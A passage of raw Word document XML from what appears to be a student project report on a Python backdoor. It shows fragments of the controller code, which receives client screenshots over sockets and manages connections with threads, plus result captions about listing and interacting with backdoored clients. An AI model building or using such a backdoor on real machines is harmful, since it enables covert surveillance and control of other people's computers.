      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    intBuffer = ""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for intCounter in range(0, len(strClientResponse)):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        if strClientResponse[intCounter].isdigit():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            intBuffer += strClientResponse[intCounter]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    intBuffer = int(intBuffer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    strFile = time.strftime("%Y%m%d%H%MSS" + ".png")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    ScrnData = recvall(intBuffer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    objPic = open(strFile, "wb")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    objPic.write(ScrnData)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    objPic.close()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("Done!!!" + "\n" + "total bytes received: " + str(os.path.getsize(strFile)) + " bytes")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId27"/>
          <w:footerReference w:type="default" r:id="rId28"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1920" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="102"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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def work():</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while True:</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de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">        intValue = queue.get()</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if intValue == 1:</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rPr>
        <w:t xml:space="preserve">            create_socket()</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rPr>
        <w:t xml:space="preserve">            socket_bind()</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rPr>
        <w:t xml:space="preserve">            socket_accept()</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elif intValue == 2:</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while True:</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rPr>
        <w:t xml:space="preserve">                time.sleep(0.2)</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w:t>
        <w:tab/>
        <w:t>if len(arrAddresses) &gt; 0:</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w:t>
        <w:tab/>
        <w:tab/>
        <w:t>main_menu()</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w:t>
        <w:tab/>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="205"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="205"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>queue.task_done()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="205"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:tab/>
        <w:t>queue.task_done()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="205"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="pt-PT"/>
        </w:rPr>
        <w:tab/>
        <w:t>sys.exit(0)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="205"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pP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def create_jobs():</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for intThreads in arrJobs:</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en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        queue.put(intThreads)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="205"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    queue.join()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="205"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>create_threads()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="205"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId29"/>
          <w:footerReference w:type="default" r:id="rId30"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1560" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>create_jobs()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:ind w:left="2588" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>RESULT &amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="223"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="198"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="4f81bc"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:color="4f81bc"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="4F81BC"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>#Output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="4f81bc"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:color="4f81bc"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="4F81BC"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="4f81bc"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:color="4f81bc"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="4F81BC"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>of listing all connections and interact with connections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="4f81bc"/>
          <w:spacing w:val="-12"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:color="4f81bc"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="4F81BC"/>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851105</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:posOffset>515357</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5854290" cy="3079073"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapThrough wrapText="bothSides" distL="152400" distR="152400">
              <wp:wrapPolygon edited="1">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="21621" y="0"/>
                <wp:lineTo x="21621" y="21617"/>
                <wp:lineTo x="0" y="21617"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="1073741840" name="officeArt object" descr="Image"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1073741840" name="Image" descr="Image"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31">
                      <a:extLst/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5854290" cy="3079073"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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198"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="198"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="4f81bc"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:color="4f81bc"/>
          <w:rtl w:val="0"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="4F81BC"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="4f81bc"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:color="4f81bc"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="4F81BC"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Look client using backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="4f81bc"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:color="4f81bc"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="4F81BC"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:drawing xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <wp:anchor distT="152400" distB="152400" distL="152400" distR="152400" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>781999</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:posOffset>332168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6102102" cy="3249369"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="152400" distB="152400"/>
            <wp:docPr id="1073741841" name="officeArt object" descr="Image"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1073741841" name="Image" descr="Image"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32">
                      <a:extLst/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6102102" cy="3249369"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="83"/>
        <w:ind w:left="100" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="83"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId33"/>
          <w:footerReference w:type="default" r:id="rId34"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1560" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="3f6797"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="3F6797"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>def work code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="3f6797"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w14:textFill>
